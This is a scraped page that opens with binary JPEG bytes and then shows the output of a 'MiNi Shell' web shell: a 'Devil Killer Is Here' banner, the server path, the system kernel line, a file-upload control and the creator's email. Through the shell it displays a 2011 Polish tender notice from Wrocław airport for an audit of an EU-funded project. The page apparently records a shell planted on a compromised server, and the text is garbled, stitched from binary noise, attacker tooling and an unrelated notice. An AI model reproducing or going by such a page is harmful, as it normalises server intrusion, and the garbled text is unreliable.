JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111014/336846-N-2011.html

<p class="kh_header"><b>Wrocław: Audyt zewnętrzny projektu nr 2008-PL-92004-S Comprehensive study and technical documentation of development of an international airport Wroclaw Portu Lotniczego Wrocław S.A.</b><br>
<b>Numer ogłoszenia: 336846 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Port Lotniczy Wrocław S.A. , ul. Skarżyńskiego 36, 54-530 Wrocław, woj. dolnośląskie, tel. 071 3581300, faks 071 3573973.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.airport.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot prawa publicznego, zamawiający sektorowy zarządzający lotniskiem.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Audyt zewnętrzny projektu nr 2008-PL-92004-S Comprehensive study and technical documentation of development of an international airport Wroclaw Portu Lotniczego Wrocław S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest 
Audyt zewnętrzny projektu nr 2008-PL-92004-S Comprehensive study and technical documentation of development of an international airport WroclawPortu Lotniczego Wrocław S.A.

1.	Szacowana wartość całkowita projektu wynosi wg danych bieżących: 1 359 907,73 euro. 
2.	 Termin realizacji zadania: 23.12.2011 r. od daty podpisania umowy; 
3.	Celem audytu jest uzyskanie dowodów pozwalających z dostateczną pewnością na jednoznaczną ocenę przez podmiot przeprowadzający audyt, czy realizacja, przez podmiot  audytowany projektu  nr 2008-PL-92004-S Comprehensive study and technical documentation of development of an international air port Wroclaw Port Lotniczy Wrocław S.A przebiega zgodnie z Umową o dofinansowanie oraz wnioskiem o dofinansowanie projektu. Efektem audytu powinno być:
a.	uzyskanie zapewnienia, że wydatki poniesione w ramach projektu są kwalifikowane oraz wydanie opinii w tym zakresie,
b.	uzyskanie zapewnienia, że projekt jest realizowany zgodnie z obowiązującymi umowami oraz wnioskiem o dofinansowanie wydanie opinii w tym zakresie, 
c.	uzyskanie opinii w zakresie stosownych mechanizmów zarządzania i kontroli, tj. posiadania i stosowania niezbędnych procedur. 

W tym celu sprawdza się, czy działania, których dotyczą poniesione wydatki:
d.	rzeczywiście zostały zrealizowane, 
e.	czy wnioski o płatność są zgodne z wymaganiami zawartymi w umowie oraz czy są poparte odpowiednimi dokumentami finansowymi, poprzez badanie w szczególności czy księgi rachunkowe (w części dotyczącej ewidencji zdarzeń gospodarczych związanych z realizacją projektu) wraz z dowodami księgowymi, stanowiącymi podstawę dokonania w nich zapisów oraz sporządzone na podstawie dokumentów potwierdzających poniesienie wydatków (faktury  lub inne dokumenty o równoważnej wartości dowodowej) wnioski o płatność, a także sprawozdania z realizacji projektu odpowiadają we wszystkich istotnych aspektach wymogom programu, są zgodne z wymogami Ustawy o Rachunkowości oraz Ustawy o Finansach Publicznych, jak również prawidłowo, rzetelnie i jasno przedstawiają sytuację finansową i majątkową projektu według stanu na dzień sporządzenia w/w dokumentów.

4.   Audyt zewnętrzny winien ocenić wiarygodności danych, zarówno liczbowych jak i opisowych, zawartych w przedstawionych przez podmiot audytowany dokumentach dotyczących realizowanego projektu. Ocena wiarygodności danych może mieć charakter bezpośredni lub pośredni, przy czym bezpośrednie sprawdzenie obejmuje badanie ksiąg rachunkowych, a sprawdzenie pośrednie - badanie działającego systemu kontroli wewnętrznej w podmiocie audytowanym posiadanie i stosowanie niezbędnych procedur. 
5. Audyt powinien obejmować przede wszystkim analizę dokumentacji oraz stosowanych 
procedur kontroli wewnętrznej w odniesieniu do przekazywania i rozliczania otrzymanych 
środków, procedur akceptacji wydatków kwalifikowalnych w zakresie ich zasadności 
i odpowiedniego udokumentowania, sprawozdawania z realizacji projektu ze szczególnym
uwzględnieniem realizacji przyjętych celów projektu i realizacji postanowień zawartych 
umów. 
6. W celu stwierdzenia, że projekt realizowany jest zgodnie z obowiązującymi umowami, 
a wydatki są kwalifikowalne - w szczególności sprawdzeniu winno podlegać:
a.	czy działania przewidziane we wniosku o dofinansowanie realizacji projektu zostały rzeczywiście podjęte,
b.	czy zapewniona została dostateczna ścieżka audytu, pozwalająca prześledzić  wydatek od przedłożenia wniosku o płatność do poszczególnych faktur,
c.	czy wydatki rozliczane wnioskami o płatność zostały ujęte w budżecie projektu, będącym załącznikiem do obowiązujących Umów i czy wydatki wykazane w dokumentach zostały rzeczywiście poniesione,
d.	kwalifikowalność poniesionych wydatków, sposób ich dokumentowania i ujęcia na wyodrębnionym rachunku bankowym wyszczególnionym w planie kont jednostki audytowanej, zgodność kwot wynikających z wniosków o płatność z zapisami księgowymi, w rozbiciu na poszczególne kwoty kwalifikowane,
e.	wiarygodność sprawozdań z realizacji projektu przekazywanych przez podmiot audytowany poprzez weryfikację i potwierdzenie wykonania prac, istnienia zakupionych towarów oraz wykonania usług/zadań zamówionych w ramach projektu,
f.	sposób monitorowania projektu (osiągania celu projektu), raportowania o postępach wdrażania projektu oraz dotrzymanie harmonogramu realizacji zadań i podzadań projektu,
g.	czy opracowano w podmiocie audytowanym procedury zarządzania i kontroli w zakresie realizacji projektu, 
h.	stosowanie zasad dotyczących promocji i reklamy projektu,
i.	poprawność stosowanych procedur ustawy o zamówieniach publicznych, 
Audytor winien zweryfikować próbkę (min.10%) ogółem poniesionych wydatków, pozwalającą wydać audytorowi wiążącą opinię oraz sporządzić raport w tym zakresie. Opinia i  raport powinny wskazywać próg istotności i poziom ufności zgodny z międzynarodowymi standardami (International Standards of Auditing - ISA). Audyt powinien zostać przeprowadzony zgodnie z powszechnie uznawanymi, międzynarodowymi standardami audytu. Zamawiający określa poziom ufności na poziomie nie niższym niż  95%. 
7.  Po przeprowadzeniu audytu, audytor zobowiązany jest do przygotowania opinii i raportu 
z przeprowadzonego audytu w formie pisemnej.
7.1 Jednostka poddana audytowi ma prawo do odniesienia się do opinii i / lub raportu w terminie 5 
dni kalendarzowych od dnia otrzymania. Opinia wraz z raportem a także stanowisko jednostki 
audytowanej są przekazywane przez beneficjenta do Instytucji Zarządzającej oraz archiwizowane w dokumentacji dotyczącej projektu.
7.2 Opinia z audytu wykorzystania środków unijnych powinna zawierać następujące informacje:
a.	Tytuł
b.	Adresata opinii
c.	Zakres wykonanej pracy
d.	Odpowiedzialność beneficjenta za sporządzenie sprawozdań i dokumentów
e.	Odpowiedzialność audytora przeprowadzającego audyt,
f.	Przywołanie stosownych przepisów prawa
g.	Stwierdzenia wyrażonej opinii
7.3. Raport z audytu powinien zawierać w szczególności elementy zamieszczone we wzorze 
raportu (patrz wzór raportu z audytu - cz. II poniżej).
7.4.	Osoby uczestniczące w przeprowadzaniu audytu powinny spełniać wymóg bezstronności i niezależności od Zamawiającego. Bezstronność i niezależność nie jest zachowana, jeżeli osoba lub podmiot przeprowadzający  audyt:
- posiada udziały, akcje lub inne tytuły własności w jednostce audytowanej lub w jednostce z   nią stowarzyszonej, dominującej, zależnej lub współzależnej,
- jest lub był w ostatnich 3 latach przedstawicielem prawnym (pełnomocnikiem), członkiem organów nadzorczych bądź zarządzających lub pracownikiem jednostki z nią stowarzyszonej, dominującej, zależnej lub współzależnej,
- w ostatnich 3 latach uczestniczył w sporządzaniu dokumentów stanowiących przedmiot audytu,
- osiągnął chociażby w jednym roku w ciągu ostatnich 5 lat co najmniej 50 % przychodu rocznego z tytułu świadczenia usług na rzecz danej jednostki audytowanej, jednostki wobec niej dominującej lub jednostek z nią stowarzyszonych, jednostek od niej zależnych lub współzależnych, nie dotyczy to pierwszego roku działalności podmiotu przeprowadzającego audyt,
- jest małżonkiem, krewnym lub powinowatym w linii prostej do drugiego stopnia lub jest  związany z tytułu opieki, przysposobienia lub kurateli z osobą zarządzającą lub będącą w organach nadzorczych jednostki albo zatrudnia przy prowadzeniu audytu takie osoby,
- jest lub był zaangażowany w planowanie, realizację, zarządzanie projektem, który następnie    audytuje,
- pozostaje w stosunku pracy z jednostką audytowaną.
8.  Miejsce wykonania zadania: siedziba Zamawiającego. Wykonawca ponosi wszystkie koszty     niezbędne do prawidłowego wykonania zadania w tym między innymi: koszty dojazdu, ewentualnych diet i/lub noclegów dla audytorów.  

UWAGA:
Integralną część niniejszego opisu przedmiotu zamówienia stanowi jego szczegółowy opis zawarty w Załączniku nr 5 SIZW..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane jest wniesienie wadium w wysokosci: 300,00 zł (słownie: trzysta złotych)
-------
wybrany wykonawca wniesie zabezpieczenie należytego wykonania umowy w wysokości 10% wartości oferty brutto.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I.WARUNKI UDZIAŁU W POSTĘPOWANIU:
1.	W przetargu mogą wziąć udział Wykonawcy, którzy  spełniają warunki określone w art. 22 Pzp, dotyczące:
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b)	posiadania wiedzy i doświadczenia;
c)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d)	sytuacji ekonomicznej i finansowej.

a ponadto:
1. Nie podlegają wykluczeniu z postępowania na podstawie art. 24. Ust.  1 Pzp.

2.  Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 2 ust. 1 pkt 1. i 2  z uwzględnieniem § 4 oraz § 5 ust. 1 pkt.3)  Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 z dnia 31 grudnia 2009r. poz. 1817):

3. Wniosą wadium w wysokości:300, 00  zł  (słownie: trzysta złotych).

II  OPIS SPOSOBU DOKONANIA OCENY SPEŁNIENIA TYCH (W-W) WARUNKÓW.

Sprawdzenie ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty - wg ZAŁĄCZNIKA NR 1 do SIWZ.
Wypełniony i podpisany formularz arkusza kalkulacyjnego - wg ZAŁĄCZNIKA NR 2 do SIWZ.
Oświadczenie, o spełnieniu warunków określonych w art. 22 ust. 1 PZP oraz o braku podstaw do wykluczenia z art. 24 ust. 1  
- Oświadczenie Wykonawcy  - wg ZAŁĄCZNIKA NR 3 do SIWZ.
Dowód wpłaty wadium (w przypadku formy pieniężnej - potwierdzenie przelewu środków finansowych na konto Zamawiającego, w przypadku pozostałych form wniesienia - wadium oryginał dokumentu należy złożyć w kasie PLW S.A. - pokój Głównego Księgowego, pierwsze piętro w siedzibie Zamawiającego naprzeciwko sekretariatu,  zaś do oferty dołączyć kopię dokumentu). Jeśli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia wadium załączyć do oferty. Oryginał dowodu wniesienia wadium należy umieścić w oznaczone kopercie -oryginał dowodu wniesienia wadium - i załączyć do oferty.
Zaakceptowany wzór umowy - ZAŁĄCZNIK NR 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>okreslono w cz. XVI Specyfikacji Istotnych Warunków Zamówienia (SIWZ)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.airport.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.airport.wroclaw.pl
u zamawiajacego - ul. Skarżyńskiego 36, 54-530 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 10:00, miejsce: sekretariat PLW S.A., pierwsze piętro, ul. Skarżyńskiego 36, 54-530 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Unii Europejskiej:
Projekt TEN-T nr 2008-PL-92004-S Kompleksowa dokumentacja studialna i techniczna dla rozwoju Międzynarodowego Portu Lotniczego Wrocław.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com